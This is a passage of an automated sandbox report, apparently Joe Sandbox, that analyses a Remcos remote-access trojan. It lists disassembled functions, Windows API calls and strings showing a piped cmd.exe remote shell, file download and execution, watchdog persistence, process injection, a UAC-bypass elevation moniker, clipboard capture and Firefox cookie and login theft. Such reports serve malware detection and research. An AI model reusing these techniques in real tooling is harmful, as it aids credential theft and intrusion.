                                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Startup
                                                        • String ID:
                                                        • API String ID: 724789610-0
                                                        • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                        • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                        • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                        • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: send
                                                        • String ID:
                                                        • API String ID: 2809346765-0
                                                        • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                        • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                                                        • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                                                        • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: recv
                                                        • String ID:
                                                        • API String ID: 1507349165-0
                                                        • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                        • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                                                        • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                                                        • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                        • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                        • API String ID: 1067849700-181434739
                                                        • Opcode ID: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                        • Opcode Fuzzy Hash: 6e6e9140662d37981cd90a958c1ecdba8d0025e4437174fb30692739c6495062
                                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                        • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                        • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                        • API String ID: 2994406822-18413064
                                                        • Opcode ID: 471981781676a880a3a4873e0551d0200168ae4b807b9526e2df510c6843e6c0
                                                        • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                        • Opcode Fuzzy Hash: 471981781676a880a3a4873e0551d0200168ae4b807b9526e2df510c6843e6c0
                                                        • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                        • OpenMutexA.KERNEL32 ref: 00412146
                                                        • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                        • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                        • API String ID: 3018269243-13974260
                                                        • Opcode ID: 2bc8fd5c154d9cc769ef6804c594b66dd22dad559f3b9a4926214948642efd23
                                                        • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                        • Opcode Fuzzy Hash: 2bc8fd5c154d9cc769ef6804c594b66dd22dad559f3b9a4926214948642efd23
                                                        • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                        • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                        • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                        • API String ID: 1164774033-3681987949
                                                        • Opcode ID: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                                        • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                        • Opcode Fuzzy Hash: a7abc2cbee64d590697779d9a46801e96057498aa45ff5fe343c94ad28998e44
                                                        • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32 ref: 004168C2
                                                        • EmptyClipboard.USER32 ref: 004168D0
                                                        • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                        • GlobalLock.KERNEL32 ref: 004168F9
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                        • SetClipboardData.USER32 ref: 00416938
                                                        • CloseClipboard.USER32 ref: 00416955
                                                        • OpenClipboard.USER32 ref: 0041695C
                                                        • GetClipboardData.USER32 ref: 0041696C
                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                        • CloseClipboard.USER32 ref: 00416984
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                        • String ID: !D@
                                                        • API String ID: 3520204547-604454484
                                                        • Opcode ID: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                                        • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                        • Opcode Fuzzy Hash: 6c018320e5b0d2cabe6153e6df3be29feb4b7020e0ff09a9ecc452abf36931f7
                                                        • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                        • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                        • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                        • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$Close$File$FirstNext
                                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 3527384056-432212279
                                                        • Opcode ID: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                                        • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                        • Opcode Fuzzy Hash: 48f1059577fb6fb3e12f81dcccae54fa1aae2825fed048d23a83c2489a6cdfe4
                                                        • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F563
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                        • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                        • API String ID: 3756808967-1743721670
                                                        • Opcode ID: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                                        • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                        • Opcode Fuzzy Hash: 8520e54c90e73ae769b9472ab5acef4e7d13580ea560d925ff866fcf30e94af2
                                                        • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$1$2$3$4$5$6$7$VG
                                                        • API String ID: 0-1861860590
                                                        • Opcode ID: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                                        • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                        • Opcode Fuzzy Hash: 6e6c7a448708c07855854a0ebdca304f9e0347beed71fdd78d4df1a7a8a0f9ff
                                                        • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00407521
                                                        • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Object_wcslen
                                                        • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                        • API String ID: 240030777-3166923314
                                                        • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                        • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                        • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                        • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                        • GetLastError.KERNEL32 ref: 0041A7BB
                                                        • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                        • String ID:
                                                        • API String ID: 3587775597-0
                                                        • Opcode ID: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                                                        • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                        • Opcode Fuzzy Hash: a92e5e22f525c5d855de5902c8743aa5aa96fd2eb9e2bef805906780dfe370d3
                                                        • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                        • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                        • String ID: lJD$lJD$lJD
                                                        • API String ID: 745075371-479184356
                                                        • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                        • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                        • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                        • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                        • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                        • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Find$CloseFile$FirstNext
                                                        • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                        • API String ID: 1164774033-405221262
                                                        • Opcode ID: e5779cf76b5a77b8801820eb787e52b5a733e9d63f63ab9a2c996bd2ffd17758
                                                        • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                        • Opcode Fuzzy Hash: e5779cf76b5a77b8801820eb787e52b5a733e9d63f63ab9a2c996bd2ffd17758
                                                        • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                        • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                        • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                        • String ID:
                                                        • API String ID: 2341273852-0
                                                        • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                        • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                        • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                        • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
